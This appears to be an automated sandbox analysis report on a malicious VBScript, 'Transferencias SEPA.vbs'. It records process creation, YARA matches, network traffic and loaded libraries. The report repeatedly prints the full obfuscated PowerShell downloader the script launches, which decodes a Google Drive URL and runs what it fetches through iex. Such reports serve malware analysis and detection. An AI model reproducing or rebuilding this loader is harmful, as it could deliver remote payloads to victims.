Source: powershell.exe, 00000002.00000002.1384995967.0000024901E4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900489000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.00000249004F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900489000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.00000249004F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900489000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.00000249004F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownHTTPS traffic detected: 173.194.219.101:443 -> 192.168.2.11:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.11:49708 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_6536.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6536, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Very long command line found
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6941
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6941Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Undervisningsdisketterne = 1;$Strafferammen='Substrin';$Strafferammen+='g';Function Toxophilism87($Sanerendes){$Uneath=$Sanerendes.Length-$Undervisningsdisketterne;For($Vacciners=5; $Vacciners -lt $Uneath; $Vacciners+=(6)){$Ceylonite+=$Sanerendes.$Strafferammen.Invoke($Vacciners, $Undervisningsdisketterne);}$Ceylonite;}function anthropometry($Registrating){& ($Bothroi) ($Registrating);}$Gimmerlams=Toxophilism87 'Ke neMNovelo TarszEbonii NonslMadrelOm kiaFiske/Luffi5,isun. algn0Fagbl Micon( Re lWvejovi.ecannFilmadDockioStudewGhi esOgre. .rocaNReal TUncon S,kke1 pars0Gsteh.Ublod0,risv; ata M,croW SmndiCatapnBefly6Ext.a4Expos;Lande LaissxKolon6Habit4Tandb;Suppe BrndrGloriv Sel,: Buke1Latin2S,eat1Baand. col,0Overm)Cloch vavtoGFodboeRichec.ellmkwhango,leuk/fo,ok2Nim u0Fests1.eesf0Thema0Skrum1Marin0Ilyas1Attr, GodfFPassainon rrMode.eBromdfAandeoMopedxRe ri/haand1Pht.i2Extem1T,lsp.Broug0Kaske ';$Nyttendes=Toxophilism87 ' SpapUDampis.orpueBrugerLabio-PhymaAKllingwergieKarklnHexadtIr,ny ';$Fraraadede=Toxophilism87 'Tentah FientharestTrstepFa,cisLenna: Guns/fabri/Underd UnderUrediiMilitvT,ereeAssyr.Herm gHu oeoOx dioFlelsgHornylRow,ieStere.Realkc Grefo Tallmunend/statsuBa.saccolle? T.ndePejlix KiefpDovneoOutmarNuchatU,ndf=QuantdJiliaoInterwTalernBjlenl Midto Tilpa DiskdTakof& Overislen,dElevr=Unpro1 reabqhovedL BevilDis.erBrand6EkspaCCho.diUdv,kWHexadFPiperPB,kseDSpermuGymnoLFu.iofHalvfJZucc,cA keruUn,huC Assap or aG lami8Photo-TiemaGStemmkoutglYTrbesK FyrsiTappexUfor hoverbbBarflztaktlaInddk ';$Pjankede=Toxophilism87 'Grune>Trste ';$Bothroi=Toxophilism87 'unobeiCereve AlarxBrock ';$Perfektibilitet = Toxophilism87 'CentueFla.kcAssonhSceneoDil t Di.ul%.ianoaSubmupMarkopErhvedNonira,ndettShutoa acch%R,mod\Pr teFC,ntrlQu nod.eaveeAlderkG lgeaTulreg IslneB fanrForur.SamfuCTaxikopreponVarme P.dal& andm&Coc f MikreTapnecP,eudhSporioDezin Frike$ ncon ';anthropometry (Toxophilism87 'Poka,$AarstgTillglg,bisoBrevsbStrigaSynsol Pal :SannalKulhyi FrigqStaalu E,evoUniv rJuv.ni Vands KjerhSkrmt= Fors( AblacAbr,kmNonredSuper Sipun/ SvincSanct Jaque$,iltrP AkemeFustirNarkofBludge VarmkMiljbtFolleiModstbSwerviYe.selFab,liLderrtPropie Beket,oist)Anemo ');anthropometry (Toxophilism87 'Cst.d$Ens,agPhenolSensuoSyddab b fia,ocialFnull: PranUDebitnNarcodF ldmeonsetrShaftv UkorgSpitftUntoliM rragSangshTolv,e Tyr,dAtomusC,lic1arbej3Fo ge4Eneba=Brunk$StokeFNeds,rClewkaBacksrUi,enaMaxima RecidS,oene Klipd PolyeUnsad. Ber s PinepRe.atl .akoiHs patUn.es( Send$ semiP NedsjSlagvanonsan SteekUndune,ochudAbse ePr.li)Amfit ');$Fraraadede=$Undervgtigheds134[0];anthropometry (Toxophilism87 'Sji p$ Pe igN.endlUbe,roTilkbb Beaca,rownlStddm:IntraGWeanleMatc,n AmtmaMaidinEncydvGnosteInthrnL.ncedUndfleResmelLy,fosSoniaeVikinsDelmol Pr,lo SeedvMotoreSgekrn Teame.ddans Renv=PiptoNStnkpeOverfwAfvis-OverdO Da.hbfyrrejStorieHeintcMultitEnriq TropSChec,y OrdesEkstetNa abeDrnu
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Undervisningsdisketterne = 1;$Strafferammen='Substrin';$Strafferammen+='g';Function Toxophilism87($Sanerendes){$Uneath=$Sanerendes.Length-$Undervisningsdisketterne;For($Vacciners=5; $Vacciners -lt $Uneath; $Vacciners+=(6)){$Ceylonite+=$Sanerendes.$Strafferammen.Invoke($Vacciners, $Undervisningsdisketterne);}$Ceylonite;}function anthropometry($Registrating){& ($Bothroi) ($Registrating);}$Gimmerlams=Toxophilism87 'Ke neMNovelo TarszEbonii NonslMadrelOm kiaFiske/Luffi5,isun. algn0Fagbl Micon( Re lWvejovi.ecannFilmadDockioStudewGhi esOgre. .rocaNReal TUncon S,kke1 pars0Gsteh.Ublod0,risv; ata M,croW SmndiCatapnBefly6Ext.a4Expos;Lande LaissxKolon6Habit4Tandb;Suppe BrndrGloriv Sel,: Buke1Latin2S,eat1Baand. col,0Overm)Cloch vavtoGFodboeRichec.ellmkwhango,leuk/fo,ok2Nim u0Fests1.eesf0Thema0Skrum1Marin0Ilyas1Attr, GodfFPassainon rrMode.eBromdfAandeoMopedxRe ri/haand1Pht.i2Extem1T,lsp.Broug0Kaske ';$Nyttendes=Toxophilism87 ' SpapUDampis.orpueBrugerLabio-PhymaAKllingwergieKarklnHexadtIr,ny ';$Fraraadede=Toxophilism87 'Tentah FientharestTrstepFa,cisLenna: Guns/fabri/Underd UnderUrediiMilitvT,ereeAssyr.Herm gHu oeoOx dioFlelsgHornylRow,ieStere.Realkc Grefo Tallmunend/statsuBa.saccolle? T.ndePejlix KiefpDovneoOutmarNuchatU,ndf=QuantdJiliaoInterwTalernBjlenl Midto Tilpa DiskdTakof& Overislen,dElevr=Unpro1 reabqhovedL BevilDis.erBrand6EkspaCCho.diUdv,kWHexadFPiperPB,kseDSpermuGymnoLFu.iofHalvfJZucc,cA keruUn,huC Assap or aG lami8Photo-TiemaGStemmkoutglYTrbesK FyrsiTappexUfor hoverbbBarflztaktlaInddk ';$Pjankede=Toxophilism87 'Grune>Trste ';$Bothroi=Toxophilism87 'unobeiCereve AlarxBrock ';$Perfektibilitet = Toxophilism87 'CentueFla.kcAssonhSceneoDil t Di.ul%.ianoaSubmupMarkopErhvedNonira,ndettShutoa acch%R,mod\Pr teFC,ntrlQu nod.eaveeAlderkG lgeaTulreg IslneB fanrForur.SamfuCTaxikopreponVarme P.dal& andm&Coc f MikreTapnecP,eudhSporioDezin Frike$ ncon ';anthropometry (Toxophilism87 'Poka,$AarstgTillglg,bisoBrevsbStrigaSynsol Pal :SannalKulhyi FrigqStaalu E,evoUniv rJuv.ni Vands KjerhSkrmt= Fors( AblacAbr,kmNonredSuper Sipun/ SvincSanct Jaque$,iltrP AkemeFustirNarkofBludge VarmkMiljbtFolleiModstbSwerviYe.selFab,liLderrtPropie Beket,oist)Anemo ');anthropometry (Toxophilism87 'Cst.d$Ens,agPhenolSensuoSyddab b fia,ocialFnull: PranUDebitnNarcodF ldmeonsetrShaftv UkorgSpitftUntoliM rragSangshTolv,e Tyr,dAtomusC,lic1arbej3Fo ge4Eneba=Brunk$StokeFNeds,rClewkaBacksrUi,enaMaxima RecidS,oene Klipd PolyeUnsad. Ber s PinepRe.atl .akoiHs patUn.es( Send$ semiP NedsjSlagvanonsan SteekUndune,ochudAbse ePr.li)Amfit ');$Fraraadede=$Undervgtigheds134[0];anthropometry (Toxophilism87 'Sji p$ Pe igN.endlUbe,roTilkbb Beaca,rownlStddm:IntraGWeanleMatc,n AmtmaMaidinEncydvGnosteInthrnL.ncedUndfleResmelLy,fosSoniaeVikinsDelmol Pr,lo SeedvMotoreSgekrn Teame.ddans Renv=PiptoNStnkpeOverfwAfvis-OverdO Da.hbfyrrejStorieHeintcMultitEnriq TropSChec,y OrdesEkstetNa abeDrnuJump to behavior
Source: Transferencias SEPA.vbsInitial sample: Strings found which are bigger than 50
Source: amsi64_6536.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6536, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal96.expl.evad.winVBS@6/6@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Fldekager.ConJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2368:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nt50uqrg.tml.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Transferencias SEPA.vbs"
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Transferencias SEPA.vbsReversingLabs: Detection: 21%
Source: Transferencias SEPA.vbsVirustotal: Detection: 13%
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Transferencias SEPA.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Undervisningsdisketterne = 1;$Strafferammen='Substrin';$Strafferammen+='g';Function Toxophilism87($Sanerendes){$Uneath=$Sanerendes.Length-$Undervisningsdisketterne;For($Vacciners=5; $Vacciners -lt $Uneath; $Vacciners+=(6)){$Ceylonite+=$Sanerendes.$Strafferammen.Invoke($Vacciners, $Undervisningsdisketterne);}$Ceylonite;}function anthropometry($Registrating){& ($Bothroi) ($Registrating);}$Gimmerlams=Toxophilism87 'Ke neMNovelo TarszEbonii NonslMadrelOm kiaFiske/Luffi5,isun. algn0Fagbl Micon( Re lWvejovi.ecannFilmadDockioStudewGhi esOgre. .rocaNReal TUncon S,kke1 pars0Gsteh.Ublod0,risv; ata M,croW SmndiCatapnBefly6Ext.a4Expos;Lande LaissxKolon6Habit4Tandb;Suppe BrndrGloriv Sel,: Buke1Latin2S,eat1Baand. col,0Overm)Cloch vavtoGFodboeRichec.ellmkwhango,leuk/fo,ok2Nim u0Fests1.eesf0Thema0Skrum1Marin0Ilyas1Attr, GodfFPassainon rrMode.eBromdfAandeoMopedxRe ri/haand1Pht.i2Extem1T,lsp.Broug0Kaske ';$Nyttendes=Toxophilism87 ' SpapUDampis.orpueBrugerLabio-PhymaAKllingwergieKarklnHexadtIr,ny ';$Fraraadede=Toxophilism87 'Tentah FientharestTrstepFa,cisLenna: Guns/fabri/Underd UnderUrediiMilitvT,ereeAssyr.Herm gHu oeoOx dioFlelsgHornylRow,ieStere.Realkc Grefo Tallmunend/statsuBa.saccolle? T.ndePejlix KiefpDovneoOutmarNuchatU,ndf=QuantdJiliaoInterwTalernBjlenl Midto Tilpa DiskdTakof& Overislen,dElevr=Unpro1 reabqhovedL BevilDis.erBrand6EkspaCCho.diUdv,kWHexadFPiperPB,kseDSpermuGymnoLFu.iofHalvfJZucc,cA keruUn,huC Assap or aG lami8Photo-TiemaGStemmkoutglYTrbesK FyrsiTappexUfor hoverbbBarflztaktlaInddk ';$Pjankede=Toxophilism87 'Grune>Trste ';$Bothroi=Toxophilism87 'unobeiCereve AlarxBrock ';$Perfektibilitet = Toxophilism87 'CentueFla.kcAssonhSceneoDil t Di.ul%.ianoaSubmupMarkopErhvedNonira,ndettShutoa acch%R,mod\Pr teFC,ntrlQu nod.eaveeAlderkG lgeaTulreg IslneB fanrForur.SamfuCTaxikopreponVarme P.dal& andm&Coc f MikreTapnecP,eudhSporioDezin Frike$ ncon ';anthropometry (Toxophilism87 'Poka,$AarstgTillglg,bisoBrevsbStrigaSynsol Pal :SannalKulhyi FrigqStaalu E,evoUniv rJuv.ni Vands KjerhSkrmt= Fors( AblacAbr,kmNonredSuper Sipun/ SvincSanct Jaque$,iltrP AkemeFustirNarkofBludge VarmkMiljbtFolleiModstbSwerviYe.selFab,liLderrtPropie Beket,oist)Anemo ');anthropometry (Toxophilism87 'Cst.d$Ens,agPhenolSensuoSyddab b fia,ocialFnull: PranUDebitnNarcodF ldmeonsetrShaftv UkorgSpitftUntoliM rragSangshTolv,e Tyr,dAtomusC,lic1arbej3Fo ge4Eneba=Brunk$StokeFNeds,rClewkaBacksrUi,enaMaxima RecidS,oene Klipd PolyeUnsad. Ber s PinepRe.atl .akoiHs patUn.es( Send$ semiP NedsjSlagvanonsan SteekUndune,ochudAbse ePr.li)Amfit ');$Fraraadede=$Undervgtigheds134[0];anthropometry (Toxophilism87 'Sji p$ Pe igN.endlUbe,roTilkbb Beaca,rownlStddm:IntraGWeanleMatc,n AmtmaMaidinEncydvGnosteInthrnL.ncedUndfleResmelLy,fosSoniaeVikinsDelmol Pr,lo SeedvMotoreSgekrn Teame.ddans Renv=PiptoNStnkpeOverfwAfvis-OverdO Da.hbfyrrejStorieHeintcMultitEnriq TropSChec,y OrdesEkstetNa abeDrnu
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fldekager.Con && echo $"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Undervisningsdisketterne = 1;$Strafferammen='Substrin';$Strafferammen+='g';Function Toxophilism87($Sanerendes){$Uneath=$Sanerendes.Length-$Undervisningsdisketterne;For($Vacciners=5; $Vacciners -lt $Uneath; $Vacciners+=(6)){$Ceylonite+=$Sanerendes.$Strafferammen.Invoke($Vacciners, $Undervisningsdisketterne);}$Ceylonite;}function anthropometry($Registrating){& ($Bothroi) ($Registrating);}$Gimmerlams=Toxophilism87 'Ke neMNovelo TarszEbonii NonslMadrelOm kiaFiske/Luffi5,isun. algn0Fagbl Micon( Re lWvejovi.ecannFilmadDockioStudewGhi esOgre. .rocaNReal TUncon S,kke1 pars0Gsteh.Ublod0,risv; ata M,croW SmndiCatapnBefly6Ext.a4Expos;Lande LaissxKolon6Habit4Tandb;Suppe BrndrGloriv Sel,: Buke1Latin2S,eat1Baand. col,0Overm)Cloch vavtoGFodboeRichec.ellmkwhango,leuk/fo,ok2Nim u0Fests1.eesf0Thema0Skrum1Marin0Ilyas1Attr, GodfFPassainon rrMode.eBromdfAandeoMopedxRe ri/haand1Pht.i2Extem1T,lsp.Broug0Kaske ';$Nyttendes=Toxophilism87 ' SpapUDampis.orpueBrugerLabio-PhymaAKllingwergieKarklnHexadtIr,ny ';$Fraraadede=Toxophilism87 'Tentah FientharestTrstepFa,cisLenna: Guns/fabri/Underd UnderUrediiMilitvT,ereeAssyr.Herm gHu oeoOx dioFlelsgHornylRow,ieStere.Realkc Grefo Tallmunend/statsuBa.saccolle? T.ndePejlix KiefpDovneoOutmarNuchatU,ndf=QuantdJiliaoInterwTalernBjlenl Midto Tilpa DiskdTakof& Overislen,dElevr=Unpro1 reabqhovedL BevilDis.erBrand6EkspaCCho.diUdv,kWHexadFPiperPB,kseDSpermuGymnoLFu.iofHalvfJZucc,cA keruUn,huC Assap or aG lami8Photo-TiemaGStemmkoutglYTrbesK FyrsiTappexUfor hoverbbBarflztaktlaInddk ';$Pjankede=Toxophilism87 'Grune>Trste ';$Bothroi=Toxophilism87 'unobeiCereve AlarxBrock ';$Perfektibilitet = Toxophilism87 'CentueFla.kcAssonhSceneoDil t Di.ul%.ianoaSubmupMarkopErhvedNonira,ndettShutoa acch%R,mod\Pr teFC,ntrlQu nod.eaveeAlderkG lgeaTulreg IslneB fanrForur.SamfuCTaxikopreponVarme P.dal& andm&Coc f MikreTapnecP,eudhSporioDezin Frike$ ncon ';anthropometry (Toxophilism87 'Poka,$AarstgTillglg,bisoBrevsbStrigaSynsol Pal :SannalKulhyi FrigqStaalu E,evoUniv rJuv.ni Vands KjerhSkrmt= Fors( AblacAbr,kmNonredSuper Sipun/ SvincSanct Jaque$,iltrP AkemeFustirNarkofBludge VarmkMiljbtFolleiModstbSwerviYe.selFab,liLderrtPropie Beket,oist)Anemo ');anthropometry (Toxophilism87 'Cst.d$Ens,agPhenolSensuoSyddab b fia,ocialFnull: PranUDebitnNarcodF ldmeonsetrShaftv UkorgSpitftUntoliM rragSangshTolv,e Tyr,dAtomusC,lic1arbej3Fo ge4Eneba=Brunk$StokeFNeds,rClewkaBacksrUi,enaMaxima RecidS,oene Klipd PolyeUnsad. Ber s PinepRe.atl .akoiHs patUn.es( Send$ semiP NedsjSlagvanonsan SteekUndune,ochudAbse ePr.li)Amfit ');$Fraraadede=$Undervgtigheds134[0];anthropometry (Toxophilism87 'Sji p$ Pe igN.endlUbe,roTilkbb Beaca,rownlStddm:IntraGWeanleMatc,n AmtmaMaidinEncydvGnosteInthrnL.ncedUndfleResmelLy,fosSoniaeVikinsDelmol Pr,lo SeedvMotoreSgekrn Teame.ddans Renv=PiptoNStnkpeOverfwAfvis-OverdO Da.hbfyrrejStorieHeintcMultitEnriq TropSChec,y OrdesEkstetNa abeDrnuJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fldekager.Con && echo $"Jump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
